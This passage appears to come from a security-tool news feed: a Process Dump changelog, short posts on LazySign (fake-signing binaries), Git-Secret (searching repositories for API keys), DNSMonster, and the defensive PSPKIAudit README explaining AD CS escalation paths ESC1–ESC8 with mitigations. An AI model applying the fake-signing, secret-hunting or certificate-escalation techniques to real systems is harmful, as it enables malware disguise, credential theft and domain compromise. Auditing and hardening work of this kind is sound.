  • Stopped Process Dump from hooking it's own process in close monitor mode.

Version 2.0 (September 18th, 2016)
  • Added new flag '-closemon' which runs Process Dump in a monitoring mode. It will pause and dump any process just as it closes. This is designed to work well with malware analysis sandboxes, to be sure to dump malware from memory beofre the malicious process closes.
  • Upgraded Process Dump to be multi-threaded. Commands that dump or get hashes from multiple processes will run separate threads per operation. Default number of threads is 16, which speeds up the general Process Dump dumping processing significantly.
  • Upgraded Process Dump to dump unattached code chunks found in memory. These are identified as executable regions in memory which are not attached to a module and do not have a PE header. It also requires that the codechunk refer to at least 2 imports to be considered valid in order to reduce noise. When dumped, a PE header is recreated along with an import table. Code chunks are fully supported by the clean hash database.
  • Added flags to control the filepath to the clean hash database as well as the output folder for dumped files.
  • Fix to generating clean hash database from user path that was causing a crash.
  • Fix to the flag '-g' that forces generation of PE headers. Before even if this flag was set, system dumps (-system), would ignore this flag when dumping a process.
  • Various performance improvements.
  • Upgraded project to VS2015.

Version 1.5 (November 21st, 2015)
  • Fixed bug where very large memory regions would cause Process Dump to hang.
  • Fixed bug where some modules at high addresses would not be found under 64-bit Windows.
  • More debug information now outputted under Verbose mode.

Version 1.4 (April 18th, 2015)
  • Added new aggressive import reconstruction approach. Now patches up all DWORDs and QWORDs in the module to the corresponding export match.
  • Added '-a (address to dump)' flag to dump a specific address. It will generate PE headers and build an import table for the address.
  • Added '-ni' flag to skip new import reconstruction algorithm.
  • Added '-g' flag to force generation of new PE header even if there exists one when dumping a module. This is good if the PE header is malformed for example.
  • Various bug fixes.

Version 1.3 (October 10th, 2013)
  • Improved handling of PE headers with sections that specify invalid virtual sizes and addresses.
  • Better module dumping methodology for dumping virtual sections down to disk sections.

Version 1.1 (April 8th, 2013)
  • Fixed a compatibility issue with Windows XP.
  • Corrected bug where process dump would print it is dumping a module but not actually dump it.
  • Implemented the '-pid ' dump flag.

Version 1.0 (April 2nd, 2013)
  • Initial release.


LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files

23 August 2021 at 21:30
By: Zion3R


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capeable of stealing or forging fake signatures for binary files. All of these tools however, have additional dependencies which require Go,python,...


This repo gives you the opportunity of fake signing with 0 additional dependencies, all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake signed binary. With some adjustments it could even be used to sign using valid certs as well ยฏ\(ใƒ„)/ยฏ



Git-Secret - Go Scripts For Finding An API Key / Some Keywords In Repository

24 August 2021 at 12:30
By: Zion3R


Go scripts for finding an API key / some keywords in repository

Update V1.0.1
  • Removing some checkers
  • Adding example file contains github dorks

How to Install

go get github.com/daffainfo/Git-Secret


How to Use
./Git-Secret
  • For path contain dorks, you can fill it with some keywords, for example

keyword.txt

password
username
keys
access_keys

Reference

DNSMonster - Passive DNS Capture/Monitoring Framework

24 August 2021 at 21:30
By: Zion3R


Passive DNS collection and monitoring built with Golang, Clickhouse and Grafana: dnsmonster implements a packet sniffer for DNS traffic. It can accept traffic from a pcap file, a live interface or a dnstap socket, and can be used to index and store thousands of DNS queries per second (it has shown to be capable of indexing 200k+ DNS queries per second on a commodity computer). It aims to be scalable, simple and easy to use, and help security teams to understand the details about an enterprise's DNS traffic. dnsmonster does not look to follow DNS conversations, rather it aims to index DNS packets as soon as they come in. It also does not aim to breach the privacy of the end-users, with the ability to mask source IP from 1 to 32 bits, making the data potentially untraceable. Blogpost

IMPORTANT NOTE: The code before version 1.x is considered beta quality and is subject to breaking changes. Please check the release notes for each tag to see the list of breaking scenarios between each release, and how to mitigate potential data loss.



Main features
  • Can use Linux's afpacket and zero-copy packet capture.
  • Supports BPF
  • Can fuzz source IP to enhance privacy
  • Can have a pre-processing sampling ratio
  • Can have a list of "skip" fqdns to avoid writing some domains/suffix/prefix to storage, thus improving DB performance
  • Can have a list of "allow" domains to only log hits of certain domains in Clickhouse/Stdout/File
  • Modular output with different logic per output stream. Currently stdout/file/clickhouse
  • Hot-reload of skip and allow domain files
  • Automatic data retention policy using ClickHouse's TTL attribute
  • Built-in dashboard using Grafana
  • Can be shipped as a single, statically-linked binary
  • Ability to be configured using Env variables, command line options or configuration file
  • Ability to sample output metrics using ClickHouse's SAMPLE capability
  • High compression ratio thanks to ClickHouse's built-in LZ4 storage
  • Supports DNS Over TCP, Fragmented DNS (udp/tcp) and IPv6
  • Supports dnstrap over Unix socket or TCP

Related projects


PSPKIAudit - PowerShell toolkit for auditing Active Directory Certificate Services (AD CS)

25 August 2021 at 12:30
By: Zion3R


PowerShell toolkit for auditing Active Directory Certificate Services (AD CS).

It is built on top of PKISolution's PSPKI toolkit (Microsoft Public License). This repo contains a newer version of PSPKI than what's available in the PSGallery (see the PSPKI directory). Vadims Podans (the creator of PSPKI) graciously provided this version as it contains patches for several bugs.

This README is only meant as a starting point- for complete details and defensive guidance, please see the "Certified Pre-Owned" whitepaper.

The module contains the following main functions:

  1. Invoke-PKIAudit - Audits the current Forest's AD CS settings, primarily analyzing the CA server and published templates for potential privilege escalation opportunities.
  2. Get-CertRequest - Examines a CA's issued certificates by querying the CA's database. Primary intention is to discover certificate requests that may have abused a certificate template privilege escalation vulnerability. In addition, if a user or computer is compromised, incident responders can use it to find certificates the CA server had issued to the compromised user/computer (which should then be revoked).

WARNING: This code is beta! We are confident that Invoke-PKIAudit will not impact the environment as the amount of data it queries is quite limited. We have not done rigorous testing with Get-CertRequest against typical CA server workloads. Get-CertRequest queries the CA's database directly and may have to process thousands of results, which might impact performance.

IF THERE ARE NO RESULTS, THIS IS NOT A GUARANTEE THAT YOUR ENVIRONMENT IS SECURE!!

WE ALSO CANNOT GUARANTEE THAT OUR MITIGATION ADVICE WILL MAKE YOUR ENVIRONMENT SECURE OR WILL NOT DISRUPT OPERATIONS!

It is your responsibility to talk to your Active Directory/PKI/Architecture team(s) to determine the best mitigations for your environment.

If the code breaks, or we missed something, please submit an issue or pull request for a fix!


Setup

Requirements

Install the following using an elevated PowerShell prompt:

  • RSAT's Certificate Services and Active Directory features. Install with the following command:
Get-WindowsCapability -Online -Name "Rsat.*" | where Name -match "CertificateServices|ActiveDIrectory" | Add-WindowsCapability -Online

Import

Download the module extract it to a folder. Then, import the module using the following commands:

cd PSPKIAudit
Get-ChildItem -Recurse | Unblock-File

Import-Module .\PSPKIAudit.psm1

Auditing AD CS Misconfigurations

Running Invoke-PKIAudit [-CAComputerName CA.DOMAIN.COM | -CAName X-Y-Z] will run all auditing checks for your existing AD CS environment, including enumerating various Certificate Authority and Certificate Template settings.

Any misconfigurations (ESC1-8) will appear as properties on the CA/template results displayed to identify the specific misconfiguration found.

If you want to change the groups/users used to test enrollment/access control, modify the $CommonLowprivPrincipals regex at the top of Invoke-PKIAudit.ps1

If you want to export all CA information to a csv, run: Get-AuditCertificateAuthority [-CAComputerName CA.DOMAIN.COM | -CAName X-Y-Z] | Export-Csv -NoTypeInformation CAs.csv

If you want to export ALL published template information to a csv (not just vulnerable templates), run: Get-AuditCertificateTemplate [-CAComputerName CA.DOMAIN.COM | -CAName X-Y-Z] | Export-Csv -NoTypeInformation templates.csv


Output Explanation

There are two main sections of output, details about discovered CAs and details about potentially vulnerable templates.

For certificate authority results:

Certificate Authority Property Description
ComputerName The system the CA is running on.
CAName The name of the CA.
ConfigString The full COMPUTER\CA_NAME configuration string.
IsRoot If the CA is a root CA.
AllowsUserSuppliedSans If the CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set.
VulnerableACL Whether the CA has a vulnerable ACL setting.
EnrollmentPrincipals Principals who have the Enroll privilege at the CA level.
EnrollmentEndpoints The CA's web services enrollment endpoints.
NTLMEnrollmentEndpoints The CA's web services enrollment endpoints that have NTLM enabled.
DACL The full access control information.
Misconfigurations ESCX indicating the specific misconfiguration present (if any).

For certificate template results:

Property Description
CA The full CA ConfigString the template is published on (null for not published).
Name The template name.
SchemaVersion The schema version (1/2/3) of the template.
OID The unique object identifier for the template.
VulnerableTemplateACL True if the template has a vulnerable ACL setting.
LowPrivCanEnroll True if low-privileged users can enroll in the template.
EnrolleeSuppliesSubject True if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present (i.e., users can supply arbitrary SANs).
EnhancedKeyUsage The usage EKUs enabled in the template.
HasAuthenticationEku True if the template has an EKU that allows for authentication.
HasDangerousEku True if the template has a "dangerous" (Any Purpose or null) EKU.
EnrollmentAgentTemplate True if the template has the "Certificate Request Agent" EKU.
CAManagerApproval True if manager approvals are needed for enrollment.
IssuanceRequirements Authorized signature information.
ValidityPeriod How long the certificate is valid for.
RenewalPeriod The renewal period for the certificate.
Owner The principal who owns the certificate.
DACL The full access control information.
Misconfigurations ESCX indicating the specific misconfiguration present (if any).

ESC1 - Misconfigured Certificate Templates

Details

This privilege escalation scenario occurs when the following conditions are met:

  1. The Enterprise CA grants low-privileged users enrollment rights. The Enterprise CA's configuration must permit low-privileged users the ability to request certificates. See the "Background - Enrollment" section at the beginning of the whitepaper paper for more details.

  2. Manager approval is disabled. This setting necessitates that a user with certificate "manager" permissions review and approve the requested certificate before the certificate is issued. See the "Background - Issuance Requirements" section at the beginning of the whitepaper paper for more details.

  3. No authorized signatures are required. This setting requires any CSR to be signed by an existing authorized certificate. See the "Background - Issuance Requirements" section at the beginning of the whitepaper for more details.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Having certificate enrollment rights allows a low-privileged attacker to request and obtain a certificate based on the template. Enrollment Rights are granted via the certificate template AD object's security descriptor.

  5. The certificate template defines EKUs that enable authentication. Applicable EKUs include Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (OID 1.3.6.1.5.2.3.4), or Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2).

  6. The certificate template allows requesters to specify a subjectAltName (SAN) in the CSR. If a requester can specify the SAN in a CSR, the requester can request a certificate as anyone (e.g., a domain admin user). The certificate template's AD object specifies if the requester can specify the SAN in its mspki-certificate-name-flag property. The mspki-certificate-name-flag property is a bitmask and if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present, a requester can specify the SAN.

TL;DR This situation means that a unprivileged users can request a certificate that can be used for domain authentication, where they can specify an arbitrary alternative name (like a domain admin). This can result in a working certificate for an elevated user like a domain admin!


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC1Template
SchemaVersion : 2
OID : ESC1 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.10657968.9897558)
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : True
EnhancedKeyUsage : Client Authentication (1.3.6.1.5.5.7.3.2)|Secure Email (1.3.6.1.5.5.7.3.4)|Encrypting File System (1.3.6.1.4.1.311.10.3.4)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC1

Mitigations

There are a few options. First, right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties"

  1. Remove the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag via "Subject Name", unchecking "Supply in Request".
    • This prevents arbitrary SAN specification in the CSR. Unless alternate names are really needed for this template, this is probably the best fix.
  2. Remove the "Client Authentication" and/or "Smart Card Logon" EKUS via "Extensions" -> "Application Policies".
    • This prevents domain authentication with this template.
  3. Enable "CA Certificate Manager Approval" in "Issuance Requirements".
    • This puts requests for this template in the "Pending Requests" queue that must be manually approved by a certificate manager.
  4. Enable Authorized Signatures" in "Issuance Requirements" (if you know what you're doing).
    • This forces CSRs to be co-signed by an Enrollment Agent certificate.
  5. Remove the ability for low-privileged users from enrolling in this template via "Security" and removing the appropriate Enroll privilege.

ESC2 - Misconfigured Certificate Templates

Details

This privilege escalation scenario occurs when the following conditions are met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

  2. Manager approval is disabled. Details are the same as in ESC1.

  3. No authorized signatures are required. Details are the same as in ESC1.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

  5. The certificate template defines Any Purpose EKUs or no EKU. The Any Purpose (OID 2.5.29.37.0) can be used for (surprise!) any purpose, including client authentication. If no EKUs are specified - i.e. the pkiextendedkeyusage is empty or the attribute doesn't exist - then the certificate is the equivalent of a subordinate CA certificate and can be used for anything.

TL;DR This is very similar to ESC1, however with the Any Purpose or no EKU, the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag does not need to be present.


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC2Template
SchemaVersion : 2
OID : ESC2 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.7730030.4389735)
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage :
HasAuthenticationEku : True
HasDangerousEku : True
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticate d Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC2

Mitigations

There are a few options. First, right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties"

  1. Remove the ability for low-privileged users from enrolling in this template via "Security" and removing the appropriate Enroll privilege.
    • This is likely the best fix, as these sensitive EKUs should not be available to low-privileged users!
  2. Enable "CA Certificate Manager Approval" in "Issuance Requirements".
    • This puts requests for this template in the "Pending Requests" queue that must be manually approved by a certificate manager.
  3. Enable Authorized Signatures" in "Issuance Requirements" (if you know what you're doing).
    • This forces CSRs to be co-signed by an Enrollment Agent certificate.

ESC3 - Misconfigured Enrollment Agent Templates

Details

This privilege escalation scenario occurs when the following conditions are met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

  2. Manager approval is disabled. Details are the same as in ESC1.

  3. No authorized signatures are required. Details are the same as in ESC1.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

  5. The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1) allows a principal to enroll for another certificate template on behalf of another user.

  6. Enrollment agents restrictions are not implemented on the CA.

TL;DR Someone with a Certificate Request (aka Enrollment) Agent certificate can enroll in other certificates on behalf of any user in the domain, for any Schema Version 1 template or any Schema Version 2+ template that requires the appropriate "Authorized Signatures/Application Policy" Issuance Requirement, unless "Enrollment Agent Restrictions" are implemented at the CA level.


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC3Template
SchemaVersion : 2
OID : ESC3 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.4300342.10028552)
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage : Certificate Request Agent (1.3.6.1.4.1.311.20.2.1)
HasAuthenticationEku : False
HasDangerousEku : False
EnrollmentAgentTemplate : True
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC3

Mitigations

There are a few options. First, right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties"

  1. Remove the ability for low-privileged users from enrolling in this template via "Security" and removing the appropriate Enroll privilege.
    • This is likely the best fix, as this sensitive EKU should not be available to low-privileged users!
  2. Enable "CA Certificate Manager Approval" in "Issuance Requirements".
    • This puts requests for this template in the "Pending Requests" queue that must be manually approved by a certificate manager.

You can also implement "Enrollment Agent Restrictions" via the Certification Authority console (certsrv.msc). On the affected CA, right click the CA name and click "Properties" -> "Enrollment Agents". There is more information on this approach here.


ESC4 - Vulnerable Certificate Template Access Control

Details

Certificate templates are securable objects in Active Directory, meaning they have a security descriptor that specifies which Active Directory principals have specific permissions over the template. Templates that have vulnerable access control grant unintended principals the ability to modify settings in the template. With modification rights, an attacker can set vulnerable EKUs (ESC1-ESC3), flip settings like CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (ESC1), and/or remove "Issuance Requirements" like manager approval or authorized signatures.


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC4Template
SchemaVersion : 2
OID : ESC4 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.1768738.6205646)
VulnerableTemplateACL : True
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage : Client Authentication (1.3.6.1.5.5.7.3.2)|Secure Email (1.3.6.1.5.5.7.3.4)|Encrypting File System (1.3.6.1.4.1.311.10.3.4)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read, Write
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC4

Mitigations

Right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties".

Go to "Security" and remove the vulnerable access control entry.


ESC5 - Vulnerable PKI AD Object Access Control

Details

A number of objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS system.

These possibilities include (but are not limited to):

  • CA server's AD computer object (i.e., compromise through RBCD)
  • The CA server's RPC/DCOM server
  • PKI-related AD objects. Any descendant AD object or container in the container CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC= (e.g., the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, etc.)

Due to the broad scope of this specific misconfiguration, we do not currently check for ESC5 by default in this toolkit.

Access paths into the CA server itself can be found in current BloodHound collection.

The CA server's RPC/DCOM server security require manual analysis.

The following commands outputs a list of users and the control/edit right the user has over a PKI-related AD object.

$Controllers = Get-AuditPKIADObjectControllers
Format-PKIAdObjectControllers $Controllers

Ensure all principals in the results absolutely require the listed rights. Often times non-tier 0 accounts (be it low privileged users/groups or lower-privileged non-AD server admins) have control of PKI-related AD objects.


Example
THESHIRE\Cert Publishers (S-1-5-21-3022474190-4230777124-3051344698-517)
GenericAll CN=THESHIRE-DC-CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=DC,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=DC,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\DC$ (S-1-5-21-3022474190-4230777124-3051344698-1000)
WriteOwner CN=THESHIRE-DC-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=DC,CN=CDP,CN=Public Key Servi ces,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=KRA,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\Domain Computers (S-1-5-21-3022474190-4230777124-3051344698-515)
WriteDacl CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\Domain Users (S-1-5-21-3022474190-4230777124-3051344698-513)
WriteAllProperties CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\john-sa (S-1-5-21-3022474190-4230777124-3051344698-1602)
GenericAll CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

NT AUTHORITY\Authenticated Users (S-1-5-11)
Owner CN=MisconfiguredTemplate,CN=Certificate Templates,C N=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
WriteOwner CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

Mitigations

Remove any vulnerable access control entries through Active Directory Users and Computers (dsa.msc) or ADSIEdit (adsiedit.msc) for configuration objects.


ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

Details

If the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is flipped in the configuration for a Certificate Authority, ANY certificate request can specify arbitrary Subject Alternative Names (SANs). This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine).

THIS SETTING SHOULD ABSOLUTELY NOT BE SET IN YOUR ENVIRONMENT.


Example
=== Certificate Authority ===


ComputerName : dc.theshire.local
CAName : theshire-DC-CA
ConfigString : dc.theshire.local\theshire-DC-CA
IsRoot : True
AllowsUserSuppliedSans : True
VulnerableACL : False
EnrollmentPrincipals : THESHIRE\Domain Users
THESHIRE\Domain Computers
THESHIRE\certmanager
THESHIRE\certadmin
THESHIRE\Nested3
EnrollmentEndpoints :
NTLMEnrollmentEndpoints :
DACL : BUILTIN\Administrators (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Domain Computers (Allow) - Enroll
THES HIRE\Enterprise Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\certmanager (Allow) - ManageCertificates, Enroll
THESHIRE\certadmin (Allow) - ManageCA, Enroll
THESHIRE\Nested3 (Allow) - ManageCertificates, Enroll
Misconfigurations : ESC6

[!] The above CA is misconfigured!

...(snip)...

[!] EDITF_ATTRIBUTESUBJECTALTNAME2 set on this CA, the following templates may be vulnerable:

CA : dc.theshire.local\theshire-DC-CA
Name : User
SchemaVersion : 1
OID : 1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.1.1
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage : Encrypting File System (1.3.6.1.4.1.311.10.3.4)|Secure Email (1.3.6.1.5.5.7.3.4)|Client Authentication (1.3.6.1 .5.5.7.3.2)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\Enterprise Admins
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
Misconfigurations :


Mitigations

Immediately remove this flag and restart the affected certificate authority from a PowerShell prompt with elevated rights against the CA server:

PS C:\> certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

PS C:\> Get-Service -ComputerName CA_HOST certsvc | Restart-Service -Force

ESC7 - Vulnerable Certificate Authority Access Control

Details

Outside of certificate templates, a certificate authority itself has a set of permissions that secure various CA actions. These permissions can be accessed from certsrv.msc, right clicking a CA, selecting properties, and switching to the Security tab.

There are two rights that are security sensitive and dangerous if unintended principals possess them:

  • ManageCA (aka "CA Administrator") - allows for administrative CA actions, including (remotely) flipping the EDITF_ATTRIBUTESUBJECTALTNAME2 bit, resulting in ESC6.
  • ManageCertificates (aka "Certificate Manager/Officer") - allows the principal to approve pending certificate requests, negating the "Manager Approval" Issuance Requirement/protection

Example
=== Certificate Authority ===


ComputerName : dc.theshire.local
CAName : theshire-DC-CA
ConfigString : dc.theshire.local\theshire-DC-CA
IsRoot : True
AllowsUserSuppliedSans : False
VulnerableACL : True
EnrollmentPrincipals : THESHIRE\Domain Users
THESHIRE\Domain Computers
THESHIRE\certmanager
THESHIRE\certadmin
THESHIRE\Nested3
EnrollmentEndpoints :
NTLMEnrollmentEndpoints :
DACL : BUILTIN\Administrators (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Users (Allow) - ManageCA, Read, Enroll
THESHIRE\Domain Computers (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\certmanager (Allow) - ManageCertificates, Enroll
THESHIRE\certadmin (Allow) - ManageCA, Enroll
THESHIRE\Nested3 (Allow) - ManageCertificates, Enroll
Misconfigurations : ESC7

[!] The above CA is misconfigured!

Mitigations

Open up the Certification Authority console (certsrv.msc) on the affected CA, right click the CA name and click "Properties".

Go to "Security" and remove the vulnerable access control entry.


ESC8 - NTLM Relay to AD CS HTTP Endpoints

NOTE: this particular check in PSPKIAudit only checks if NTLM is present for any published enrollment endpoints. It does NOT check if Extended Protection for Authentication is present for these NTLM-enabled endoints, so false positives may occur!


Details

AD CS supports several HTTP-based enrollment methods via additional AD CS server roles that administrators can install. These HTTP-based certificate enrollment interfaces are all vulnerable NTLM relay attacks.

Using NTLM relay, an attacker on a compromised machine can impersonate any inbound-NTLM-authenticating AD account. While impersonating the victim account, an attacker could access these web interfaces and request a client authentication certificate based on the User or Machine certificate templates.


Example
=== Certificate Authority ===


ComputerName : dc.theshire.local
CAName : theshire-DC-CA
ConfigString : dc.theshire.local\theshire-DC-CA
IsRoot : True
AllowsUserSuppliedSans : False
VulnerableACL : False
EnrollmentPrincipals : THESHIRE\Domain Users
THESHIRE\Domain Computers
THESHIRE\certmanager
THESHIRE\certadmin
THESHIRE\Nested3
EnrollmentEndpoints : http://dc.theshire.local/certsrv/
NTLMEnrollmentEndpoints : http://dc.theshire.local/certsrv/
DACL : BUILTIN\Administrators (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\D omain Computers (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\certmanager (Allow) - ManageCertificates, Enroll
THESHIRE\certadmin (Allow) - ManageCA, Enroll
THESHIRE\Nested3 (Allow) - ManageCertificates, Enroll
Misconfigurations : ESC8

[!] The above CA is misconfigured!

Mitigations

Either remove the HTTP(S) enrollment endpoints, disable NTLM for the endopints, or enable Extended Protection for Authentication. See Harden AD CS HTTP Endpoints โ€“ PREVENT8 in the whitepaper for more deatils.


Misc - Explicit Mappings

Another possible mitigation for some situations is to enforce explicit mappings for certificates. This disables the use of alternate SANs in certificates when authenticating to Active Directory.

For Kerberos, setting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc ! UseSubjectAltName key to 00000000 forces an explicit mapping. There are more details in KB4043463.

Disabling explicit mappings for SChannel is not really documented, but based on our research settings 0x1 or 0x2 to the HKEY_LOCAL_MACHINE\CurrentControlSet\Control\SecurityProviders\SCHANNEL ! CertificateMappingMethods key appears to block SANs, but more testing is needed.


Triaging Existing Issued Certificate Requests

WARNING: this functionality has been minimally tested in large environments!

Note: see "Monitor User/Machine Certificate Enrollments - DETECT1" in the whitepaper for additional information and how to perform these searches with certutil.

If you want to examine existing issued certificate requests, for example to see if any requests specified arbitrary SANs, or were requested for specific templates/by specific principals, the Get-CertRequest [-CAComputerName COMPUTER.DOMAIN.COM | -CAName X-Y-Z] function builds on various PSPKI functions to give more contextual information.

Specifically, the raw Certificate Signing Request (CSR) is extracted for every currently issued certificate in the domain, and specific information (i.e., whether a SAN was specified, the requestor name/machine/process, etc.) is constructed from the request to enrich the CSR object.

The following flags can be useful:

Flag Description
-HasSAN Only return issued certificates that has a Subject Alternative Name specified in the request.
-Requester DOMAIN\USER Only return issued certificate requests for the specific requesting user.
-Template TEMPLATE_NAME Only return return issued certificate requests for the specified template name.

To export ALL issued certificate requests to csv, use Get-CertRequest | Export-CSV -NoTypeInformation requests.csv.

